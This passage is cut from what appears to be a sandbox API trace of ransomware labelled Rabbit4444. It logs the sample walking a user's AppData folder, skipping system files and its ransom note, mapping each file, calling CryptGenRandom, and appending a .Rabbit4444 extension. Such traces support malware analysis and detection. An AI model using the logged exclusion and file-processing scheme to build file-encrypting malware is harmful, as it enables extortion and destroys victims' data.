ftCreationTime.dwHighDateTime=0x1d4c760, ftLastAccessTime.dwLowDateTime=0x47e29970, ftLastAccessTime.dwHighDateTime=0x1d4d3ae, ftLastWriteTime.dwLowDateTime=0x47e29970, ftLastWriteTime.dwHighDateTime=0x1d4d3ae, nFileSizeHigh=0x0, nFileSizeLow=0x802b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8_EFGX27w7PcwVcM.flv", cAlternateFileName="8_EFGX~1.FLV")) returned 1 [0050.307] lstrcmpiW (lpString1="8_EFGX27w7PcwVcM.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.307] lstrcmpiW (lpString1="8_EFGX27w7PcwVcM.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.307] lstrcmpiW (lpString1="8_EFGX27w7PcwVcM.flv", lpString2="Rabbit4444.exe") returned -1 [0050.307] lstrcmpiW (lpString1="8_EFGX27w7PcwVcM.flv", lpString2=".") returned 1 [0050.307] lstrcmpiW (lpString1="8_EFGX27w7PcwVcM.flv", lpString2="..") returned 1 [0050.307] lstrcmpiW (lpString1="8_EFGX27w7PcwVcM.flv", lpString2="windows") returned -1 [0050.307] lstrcmpiW (lpString1="8_EFGX27w7PcwVcM.flv", lpString2="bootmgr") returned -1 [0050.307] lstrcmpiW (lpString1="8_EFGX27w7PcwVcM.flv", lpString2="pagefile.sys") returned -1 [0050.308] lstrcmpiW (lpString1="8_EFGX27w7PcwVcM.flv", lpString2="boot") returned -1 [0050.308] lstrcmpiW (lpString1="8_EFGX27w7PcwVcM.flv", lpString2="ids.txt") returned -1 [0050.308] lstrcmpiW (lpString1="8_EFGX27w7PcwVcM.flv", lpString2="NTUSER.DAT") returned -1 [0050.308] lstrcpyW (in: lpString1=0x130eb78, lpString2="8_EFGX27w7PcwVcM.flv" | out: lpString1="8_EFGX27w7PcwVcM.flv") returned="8_EFGX27w7PcwVcM.flv" [0050.308] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\8_EFGX27w7PcwVcM.flv", dwFileAttributes=0x0) returned 1 [0050.308] lstrlenW (lpString="8_EFGX27w7PcwVcM.flv") returned 20 [0050.308] lstrlenW (lpString="Rabbit4444") returned 10 [0050.308] lstrcmpiW (lpString1="PcwVcM.flv", lpString2="Rabbit4444") returned -1 [0050.308] lstrlenW (lpString=".dll") returned 4 [0050.308] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0050.308] lstrlenW (lpString=".lnk") returned 4 [0050.308] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0050.308] lstrlenW (lpString=".ini") returned 4 [0050.308] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0050.308] lstrlenW (lpString=".sys") returned 4 [0050.308] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0050.308] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\8_EFGX27w7PcwVcM.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\8_efgx27w7pcwvcm.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.308] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.308] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14161902467) returned 1 [0050.308] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=32811) returned 1 [0050.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0050.308] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0050.308] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8330, lpName=0x0) returned 0x298 [0050.309] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8330) returned 0x70000 [0050.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.310] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.310] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.310] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.310] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.310] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.310] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14162074429) returned 1 [0050.310] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0050.310] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0050.310] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.310] CloseHandle (hObject=0x298) returned 1 [0050.311] CloseHandle (hObject=0x278) returned 1 [0050.311] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\8_EFGX27w7PcwVcM.flv.Rabbit4444") returned 63 [0050.311] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\8_EFGX27w7PcwVcM.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\8_efgx27w7pcwvcm.flv"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\8_EFGX27w7PcwVcM.flv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\8_efgx27w7pcwvcm.flv.rabbit4444"), dwFlags=0x1) returned 1 [0050.312] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42d40cf2, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7161656c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x7b7983c6, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0050.312] lstrcmpiW (lpString1="Adobe", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.312] lstrcmpiW (lpString1="Adobe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.312] lstrcmpiW (lpString1="Adobe", lpString2="Rabbit4444.exe") returned -1 [0050.312] lstrcmpiW (lpString1="Adobe", lpString2=".") returned 1 [0050.312] lstrcmpiW (lpString1="Adobe", lpString2="..") returned 1 [0050.312] lstrcmpiW (lpString1="Adobe", lpString2="windows") returned -1 [0050.312] lstrcmpiW (lpString1="Adobe", lpString2="bootmgr") returned -1 [0050.312] lstrcmpiW (lpString1="Adobe", lpString2="pagefile.sys") returned -1 [0050.312] lstrcmpiW (lpString1="Adobe", lpString2="boot") returned -1 [0050.312] lstrcmpiW (lpString1="Adobe", lpString2="ids.txt") returned -1 [0050.312] lstrcmpiW (lpString1="Adobe", lpString2="NTUSER.DAT") returned -1 [0050.312] lstrcpyW (in: lpString1=0x130eb78, lpString2="Adobe" | out: lpString1="Adobe") returned="Adobe" [0050.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0050.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4c) returned 0x10cd98 [0050.312] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6570 [0050.312] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e40d770, ftCreationTime.dwHighDateTime=0x1d4d3e8, ftLastAccessTime.dwLowDateTime=0x86661920, ftLastAccessTime.dwHighDateTime=0x1d4c7f5, ftLastWriteTime.dwLowDateTime=0x86661920, ftLastWriteTime.dwHighDateTime=0x1d4c7f5, nFileSizeHigh=0x0, nFileSizeLow=0xf2fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B3oYZNTXYVTXgAyXg.mp4", cAlternateFileName="B3OYZN~1.MP4")) returned 1 [0050.312] lstrcmpiW (lpString1="B3oYZNTXYVTXgAyXg.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.312] lstrcmpiW (lpString1="B3oYZNTXYVTXgAyXg.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.312] lstrcmpiW (lpString1="B3oYZNTXYVTXgAyXg.mp4", lpString2="Rabbit4444.exe") returned -1 [0050.312] lstrcmpiW (lpString1="B3oYZNTXYVTXgAyXg.mp4", lpString2=".") returned 1 [0050.312] lstrcmpiW (lpString1="B3oYZNTXYVTXgAyXg.mp4", lpString2="..") returned 1 [0050.312] lstrcmpiW (lpString1="B3oYZNTXYVTXgAyXg.mp4", lpString2="windows") returned -1 [0050.312] lstrcmpiW (lpString1="B3oYZNTXYVTXgAyXg.mp4", lpString2="bootmgr") returned -1 [0050.312] lstrcmpiW (lpString1="B3oYZNTXYVTXgAyXg.mp4", lpString2="pagefile.sys") returned -1 [0050.312] lstrcmpiW (lpString1="B3oYZNTXYVTXgAyXg.mp4", lpString2="boot") returned -1 [0050.312] lstrcmpiW (lpString1="B3oYZNTXYVTXgAyXg.mp4", lpString2="ids.txt") returned -1 [0050.312] lstrcmpiW (lpString1="B3oYZNTXYVTXgAyXg.mp4", lpString2="NTUSER.DAT") returned -1 [0050.312] lstrcpyW (in: lpString1=0x130eb78, lpString2="B3oYZNTXYVTXgAyXg.mp4" | out: lpString1="B3oYZNTXYVTXgAyXg.mp4") returned="B3oYZNTXYVTXgAyXg.mp4" [0050.312] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\B3oYZNTXYVTXgAyXg.mp4", dwFileAttributes=0x0) returned 1 [0050.313] lstrlenW (lpString="B3oYZNTXYVTXgAyXg.mp4") returned 21 [0050.313] lstrlenW (lpString="Rabbit4444") returned 10 [0050.313] lstrcmpiW (lpString1="XgAyXg.mp4", lpString2="Rabbit4444") returned 1 [0050.313] lstrlenW (lpString=".dll") returned 4 [0050.313] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0050.313] lstrlenW (lpString=".lnk") returned 4 [0050.313] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0050.313] lstrlenW (lpString=".ini") returned 4 [0050.313] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0050.313] lstrlenW (lpString=".sys") returned 4 [0050.313] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0050.313] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\B3oYZNTXYVTXgAyXg.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\b3oyzntxyvtxgayxg.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.313] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.313] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14162388411) returned 1 [0050.313] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=62205) returned 1 [0050.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0050.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0050.313] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf600, lpName=0x0) returned 0x298 [0050.314] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf600) returned 0x70000 [0050.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.315] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.315] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14162730849) returned 1 [0050.317] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0050.317] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0050.317] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.317] CloseHandle (hObject=0x298) returned 1 [0050.317] CloseHandle (hObject=0x278) returned 1 [0050.318] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\B3oYZNTXYVTXgAyXg.mp4.Rabbit4444") returned 64 [0050.318] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\B3oYZNTXYVTXgAyXg.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\b3oyzntxyvtxgayxg.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\B3oYZNTXYVTXgAyXg.mp4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\b3oyzntxyvtxgayxg.mp4.rabbit4444"), dwFlags=0x1) returned 1 [0050.318] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b360f90, ftCreationTime.dwHighDateTime=0x1d4d19e, ftLastAccessTime.dwLowDateTime=0x6bdc69e0, ftLastAccessTime.dwHighDateTime=0x1d4cefa, ftLastWriteTime.dwLowDateTime=0x6bdc69e0, ftLastWriteTime.dwHighDateTime=0x1d4cefa, nFileSizeHigh=0x0, nFileSizeLow=0x17d09, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BYMMds-tqy3Cr.wav", cAlternateFileName="BYMMDS~1.WAV")) returned 1 [0050.318] lstrcmpiW (lpString1="BYMMds-tqy3Cr.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.318] lstrcmpiW (lpString1="BYMMds-tqy3Cr.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.318] lstrcmpiW (lpString1="BYMMds-tqy3Cr.wav", lpString2="Rabbit4444.exe") returned -1 [0050.318] lstrcmpiW (lpString1="BYMMds-tqy3Cr.wav", lpString2=".") returned 1 [0050.318] lstrcmpiW (lpString1="BYMMds-tqy3Cr.wav", lpString2="..") returned 1 [0050.318] lstrcmpiW (lpString1="BYMMds-tqy3Cr.wav", lpString2="windows") returned -1 [0050.319] lstrcmpiW (lpString1="BYMMds-tqy3Cr.wav", lpString2="bootmgr") returned 1 [0050.319] lstrcmpiW (lpString1="BYMMds-tqy3Cr.wav", lpString2="pagefile.sys") returned -1 [0050.319] lstrcmpiW (lpString1="BYMMds-tqy3Cr.wav", lpString2="boot") returned 1 [0050.319] lstrcmpiW (lpString1="BYMMds-tqy3Cr.wav", lpString2="ids.txt") returned -1 [0050.319] lstrcmpiW (lpString1="BYMMds-tqy3Cr.wav", lpString2="NTUSER.DAT") returned -1 [0050.319] lstrcpyW (in: lpString1=0x130eb78, lpString2="BYMMds-tqy3Cr.wav" | out: lpString1="BYMMds-tqy3Cr.wav") returned="BYMMds-tqy3Cr.wav" [0050.319] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\BYMMds-tqy3Cr.wav", dwFileAttributes=0x0) returned 1 [0050.319] lstrlenW (lpString="BYMMds-tqy3Cr.wav") returned 17 [0050.319] lstrlenW (lpString="Rabbit4444") returned 10 [0050.319] lstrcmpiW (lpString1="tqy3Cr.wav", lpString2="Rabbit4444") returned 1 [0050.319] lstrlenW (lpString=".dll") returned 4 [0050.319] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0050.319] lstrlenW (lpString=".lnk") returned 4 [0050.319] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0050.319] lstrlenW (lpString=".ini") returned 4 [0050.319] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0050.319] lstrlenW (lpString=".sys") returned 4 [0050.319] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0050.319] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\BYMMds-tqy3Cr.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bymmds-tqy3cr.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.319] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.319] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14163005933) returned 1 [0050.319] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=97545) returned 1 [0050.319] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0050.319] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0050.319] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x18010, lpName=0x0) returned 0x298 [0050.320] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18010) returned 0x70000 [0050.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.322] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.323] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14163338618) returned 1 [0050.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0050.323] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0050.323] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.324] CloseHandle (hObject=0x298) returned 1 [0050.324] CloseHandle (hObject=0x278) returned 1 [0050.326] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\BYMMds-tqy3Cr.wav.Rabbit4444") returned 60 [0050.326] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\BYMMds-tqy3Cr.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bymmds-tqy3cr.wav"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\BYMMds-tqy3Cr.wav.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\bymmds-tqy3cr.wav.rabbit4444"), dwFlags=0x1) returned 1 [0050.326] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25500780, ftCreationTime.dwHighDateTime=0x1d4c977, ftLastAccessTime.dwLowDateTime=0xcbe26440, ftLastAccessTime.dwHighDateTime=0x1d4cdea, ftLastWriteTime.dwLowDateTime=0xcbe26440, ftLastWriteTime.dwHighDateTime=0x1d4cdea, nFileSizeHigh=0x0, nFileSizeLow=0x9d0c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ce_n4dDEp l89.mp4", cAlternateFileName="CE_N4D~1.MP4")) returned 1 [0050.326] lstrcmpiW (lpString1="Ce_n4dDEp l89.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.326] lstrcmpiW (lpString1="Ce_n4dDEp l89.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.326] lstrcmpiW (lpString1="Ce_n4dDEp l89.mp4", lpString2="Rabbit4444.exe") returned -1 [0050.326] lstrcmpiW (lpString1="Ce_n4dDEp l89.mp4", lpString2=".") returned 1 [0050.326] lstrcmpiW (lpString1="Ce_n4dDEp l89.mp4", lpString2="..") returned 1 [0050.326] lstrcmpiW (lpString1="Ce_n4dDEp l89.mp4", lpString2="windows") returned -1 [0050.326] lstrcmpiW (lpString1="Ce_n4dDEp l89.mp4", lpString2="bootmgr") returned 1 [0050.326] lstrcmpiW (lpString1="Ce_n4dDEp l89.mp4", lpString2="pagefile.sys") returned -1 [0050.326] lstrcmpiW (lpString1="Ce_n4dDEp l89.mp4", lpString2="boot") returned 1 [0050.326] lstrcmpiW (lpString1="Ce_n4dDEp l89.mp4", lpString2="ids.txt") returned -1 [0050.326] lstrcmpiW (lpString1="Ce_n4dDEp l89.mp4", lpString2="NTUSER.DAT") returned -1 [0050.326] lstrcpyW (in: lpString1=0x130eb78, lpString2="Ce_n4dDEp l89.mp4" | out: lpString1="Ce_n4dDEp l89.mp4") returned="Ce_n4dDEp l89.mp4" [0050.326] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Ce_n4dDEp l89.mp4", dwFileAttributes=0x0) returned 1 [0050.327] lstrlenW (lpString="Ce_n4dDEp l89.mp4") returned 17 [0050.327] lstrlenW (lpString="Rabbit4444") returned 10 [0050.327] lstrcmpiW (lpString1="Ep l89.mp4", lpString2="Rabbit4444") returned -1 [0050.327] lstrlenW (lpString=".dll") returned 4 [0050.327] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0050.327] lstrlenW (lpString=".lnk") returned 4 [0050.327] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0050.327] lstrlenW (lpString=".ini") returned 4 [0050.327] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0050.327] lstrlenW (lpString=".sys") returned 4 [0050.327] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0050.327] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Ce_n4dDEp l89.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ce_n4ddep l89.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.327] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.327] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14163775477) returned 1 [0050.327] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=40204) returned 1 [0050.327] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0050.327] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0050.327] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa010, lpName=0x0) returned 0x298 [0050.328] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa010) returned 0x70000 [0050.329] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x101e20) returned 1 [0050.329] CryptGenRandom (in: hProv=0x101e20, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0050.330] CryptReleaseContext (hProv=0x101e20, dwFlags=0x0) returned 1 [0050.330] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.330] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.330] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0050.330] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0050.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.330] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14164087240) returned 1 [0050.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0050.330] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0050.330] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.331] CloseHandle (hObject=0x298) returned 1 [0050.331] CloseHandle (hObject=0x278) returned 1 [0050.331] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Ce_n4dDEp l89.mp4.Rabbit4444") returned 60 [0050.331] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Ce_n4dDEp l89.mp4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ce_n4ddep l89.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Ce_n4dDEp l89.mp4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ce_n4ddep l89.mp4.rabbit4444"), dwFlags=0x1) returned 1 [0050.332] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e77b9d0, ftCreationTime.dwHighDateTime=0x1d4d558, ftLastAccessTime.dwLowDateTime=0xd7f36be0, ftLastAccessTime.dwHighDateTime=0x1d4cb55, ftLastWriteTime.dwLowDateTime=0xd7f36be0, ftLastWriteTime.dwHighDateTime=0x1d4cb55, nFileSizeHigh=0x0, nFileSizeLow=0xdae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CiU0ITa 8V.mp3", cAlternateFileName="CIU0IT~1.MP3")) returned 1 [0050.332] lstrcmpiW (lpString1="CiU0ITa 8V.mp3", lpString2="HOW TO 